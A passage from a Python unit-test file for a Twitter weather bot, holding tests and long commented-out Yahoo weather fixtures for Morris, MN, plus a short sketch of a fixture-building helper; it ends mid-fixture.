fallback = {'lat': 55.76, 'lng': 12.49, 'name': 'Lyngby-Taarbæk, Hovedstaden'}
morris = {'lat': 45.585, 'lng': -95.91, 'name': 'Morris, MN'}
loc = weatherBot.get_location_from_user_timeline('MorrisMNWeather', fallback)
self.assertTrue(type(loc) is dict)
self.assertEqual(loc, morris)
self.assertEqual(weatherBot.get_location_from_user_timeline('twitter', fallback), fallback)
def test_get_forecast_object(self):
"""Testing getting the forecastio object"""
forecast = weatherBot.get_forecast_object(self.location['lat'], self.location['lng'], 'us')
self.assertEqual(forecast.response.status_code, 200)
bad_forecast = weatherBot.get_forecast_object(345.5, 123.45, 'us')
self.assertEqual(bad_forecast, None)
# def test_get_normal_weather_variables(self):
# """Testing if weather data fields copied successfully"""
# weather_data = weatherBot.get_weather_variables(ydataNorm)
# self.assertEqual(weather_data['windSpeed'], 9.0)
# self.assertEqual(weather_data['wind_direction'], 'NW')
# self.assertEqual(weather_data['apparentTemperature'], 37)
# self.assertEqual(weather_data['windSpeed_and_unit'], '9 mph')
# self.assertEqual(weather_data['humidity'], 70)
# self.assertEqual(weather_data['temp'], 43)
# self.assertEqual(weather_data['code'], 33)
# self.assertEqual(weather_data['condition'], 'fair')
# self.assertEqual(weather_data['deg_unit'], deg + 'F')
# self.assertEqual(weather_data['temp_and_unit'], '43' + deg + 'F')
# self.assertEqual(weather_data['city'], 'Morris')
# self.assertEqual(weather_data['region'], 'MN')
# self.assertEqual(weather_data['latitude'], '45.59')
# self.assertEqual(weather_data['longitude'], '-95.9')
# self.assertEqual(weather_data['forecast'], [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}])
# self.assertTrue(weather_data['valid'])
#
# def test_get_empty_weather_variables(self):
# """Testing if variables with a fallback are set correctly"""
# ydata = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
# Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '37', 'direction': '', 'speed': ''}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data = weatherBot.get_weather_variables(ydata)
# self.assertEqual(weather_data['windSpeed'], 0.0)
# self.assertEqual(weather_data['wind_direction'], 'N')
# self.assertEqual(weather_data['apparentTemperature'], 37)
# self.assertEqual(weather_data['windSpeed_and_unit'], '0 mph')
# self.assertEqual(weather_data['humidity'], 70)
# self.assertEqual(weather_data['temp'], 43)
# self.assertEqual(weather_data['code'], 33)
# self.assertEqual(weather_data['condition'], 'fair')
# self.assertEqual(weather_data['deg_unit'], deg + 'F')
# self.assertEqual(weather_data['temp_and_unit'], '43' + deg + 'F')
# self.assertEqual(weather_data['city'], 'Morris')
# self.assertEqual(weather_data['region'], 'MN')
# self.assertEqual(weather_data['latitude'], '45.59')
# self.assertEqual(weather_data['longitude'], '-95.9')
# self.assertEqual(weather_data['forecast'], [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}])
# self.assertTrue(weather_data['valid'])
#
# def test_get_weather_variables_error(self):
# """Testing if getting weather variables with a malformed input is valid"""
# ydata = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {}, 'count': 1}}}
# weather_data = weatherBot.get_weather_variables(ydata)
# self.assertFalse(weather_data['valid'])
#
# def test_normal_tweet(self):
# """Testing if normal tweet contains the condition and temperature"""
# weather_data = weatherBot.get_weather_variables(ydataNorm)
# returned = weatherBot.make_normal_tweet(weather_data)
# self.assertTrue('fair' in returned)
# self.assertTrue('43' + deg + 'F' in returned)
#
# def test_make_special_tweet_normal(self):
# """Testing if normal event is triggered"""
# weather_data = weatherBot.get_weather_variables(ydataNorm)
# self.assertEqual(weatherBot.make_special_tweet(weather_data), 'normal')
#
# def test_make_special_tweet_error3200(self):
# """Testing if weather code is 3200/an error event is triggered"""
# ydata = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
# Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '3200', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '37', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data = weatherBot.get_weather_variables(ydata)
# self.assertEqual(weatherBot.make_special_tweet(weather_data), 'Someone messed up, apparently the current condition is \"not available\" http://www.reactiongifs.com/wp-content/uploads/2013/08/air-quotes.gif')
#
# def test_make_special_tweet_very_hot(self):
# """Testing if very hot temperatures event is triggered"""
# ydata_f = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
# Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '100', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '95', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data_f = weatherBot.get_weather_variables(ydata_f)
# self.assertEqual(weatherBot.make_special_tweet(weather_data_f), 'Holy moly it\'s 100' + deg + 'F. I could literally (figuratively) melt.')
# ydata_c = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
# Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '37', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '35', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data_c = weatherBot.get_weather_variables(ydata_c)
# self.assertEqual(weatherBot.make_special_tweet(weather_data_c), 'Holy moly it\'s 37' + deg + 'C. I could literally (figuratively) melt.')
# ydata_c2 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '52', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '35', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data_c2 = weatherBot.get_weather_variables(ydata_c2)
# self.assertEqual(weatherBot.make_special_tweet(weather_data_c2), 'normal')
#
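# The commented-out tests above and below each paste the same multi-kilobyte
# YQL fixture, varying only a handful of fields. As a sketch of how to trim
# that duplication (BASE_YDATA and make_ydata below are hypothetical helpers,
# not part of weatherBot), a deepcopy-based builder keeps each case down to
# the fields that actually differ:

```python
import copy

# Minimal stand-in for the repeated YQL fixture; only the channel fields the
# tests vary are spelled out, everything else in the real response is elided.
BASE_YDATA = {
    'query': {'results': {'channel': {
        'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'},
        'item': {'condition': {'temp': '43', 'code': '33', 'text': 'Fair'}},
        'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'},
        'wind': {'chill': '37', 'direction': '310', 'speed': '9'},
    }}}
}


def make_ydata(condition=None, wind=None, units=None, atmosphere=None):
    """Return a deep copy of BASE_YDATA with the given channel fields updated."""
    data = copy.deepcopy(BASE_YDATA)
    channel = data['query']['results']['channel']
    if condition:
        channel['item']['condition'].update(condition)
    for key, overrides in (('wind', wind), ('units', units), ('atmosphere', atmosphere)):
        if overrides:
            channel[key].update(overrides)
    return data


# e.g. the cold-Fahrenheit case only needs the temperature and wind chill:
ydata_cold = make_ydata(condition={'temp': '-22'}, wind={'chill': '-26'})
```

# Because the builder deep-copies, each test gets an independent fixture and
# BASE_YDATA itself is never mutated.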
# def test_make_special_tweet_cold(self):
# """Testing if the cold temperature event is triggered"""
# ydata_f = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '-22', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data_f = weatherBot.get_weather_variables(ydata_f)
# self.assertEqual(weatherBot.make_special_tweet(weather_data_f), 'It\'s -22' + deg + 'F. Too cold.')
# ydata_c = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '-30', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data_c = weatherBot.get_weather_variables(ydata_c)
# self.assertEqual(weatherBot.make_special_tweet(weather_data_c), 'It\'s -30' + deg + 'C. Too cold.')
#
# def test_make_special_tweet_low_humidity(self):
# """Testing if low humidity event is triggered"""
# ydata = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '4', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '3200', 'text': 'Fair'}, 